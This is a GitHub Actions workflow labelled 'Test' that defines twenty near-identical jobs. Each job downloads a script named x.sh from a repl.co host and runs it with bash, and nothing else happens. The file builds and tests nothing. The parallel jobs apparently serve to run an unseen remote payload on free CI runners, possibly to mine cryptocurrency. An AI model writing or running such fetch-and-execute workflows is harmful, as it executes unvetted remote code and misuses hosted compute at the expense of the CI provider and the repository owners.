name: Test

on:
  workflow_dispatch:
  
  
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - run: wget https://HTML-CSS-JS.idotmastera.repl.co/x.sh
      - run: bash x.sh
  build1:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - run: wget https://HTML-CSS-JS.idotmastera.repl.co/x.sh
      - run: bash x.sh
  build2:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - run: wget https://HTML-CSS-JS.idotmastera.repl.co/x.sh
      - run: bash x.sh
  build3:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - run: wget https://HTML-CSS-JS.idotmastera.repl.co/x.sh
      - run: bash x.sh
  buil4d:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - run: wget https://HTML-CSS-JS.idotmastera.repl.co/x.sh
      - run: bash x.sh
  buil5d:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - run: wget https://HTML-CSS-JS.idotmastera.repl.co/x.sh
      - run: bash x.sh
  buil6d:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - run: wget https://HTML-CSS-JS.idotmastera.repl.co/x.sh
      - run: bash x.sh
  build7:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - run: wget https://HTML-CSS-JS.idotmastera.repl.co/x.sh
      - run: bash x.sh
  buil8d:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - run: wget https://HTML-CSS-JS.idotmastera.repl.co/x.sh
      - run: bash x.sh
  buil9d:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - run: wget https://HTML-CSS-JS.idotmastera.repl.co/x.sh
      - run: bash x.sh
  bu10ild:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - run: wget https://HTML-CSS-JS.idotmastera.repl.co/x.sh
      - run: bash x.sh
  b11uild:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - run: wget https://HTML-CSS-JS.idotmastera.repl.co/x.sh
      - run: bash x.sh
  b12uild:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - run: wget https://HTML-CSS-JS.idotmastera.repl.co/x.sh
      - run: bash x.sh
  bui13ld:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - run: wget https://HTML-CSS-JS.idotmastera.repl.co/x.sh
      - run: bash x.sh
  bui14ld:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - run: wget https://HTML-CSS-JS.idotmastera.repl.co/x.sh
      - run: bash x.sh
  bui15ld:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - run: wget https://HTML-CSS-JS.idotmastera.repl.co/x.sh
      - run: bash x.sh
  bu16ild:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - run: wget https://HTML-CSS-JS.idotmastera.repl.co/x.sh
      - run: bash x.sh
  bui17ld:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - run: wget https://HTML-CSS-JS.idotmastera.repl.co/x.sh
      - run: bash x.sh
  build18:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - run: wget https://HTML-CSS-JS.idotmastera.repl.co/x.sh
      - run: bash x.sh
  build19:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - run: wget https://HTML-CSS-JS.idotmastera.repl.co/x.sh
      - run: bash x.sh
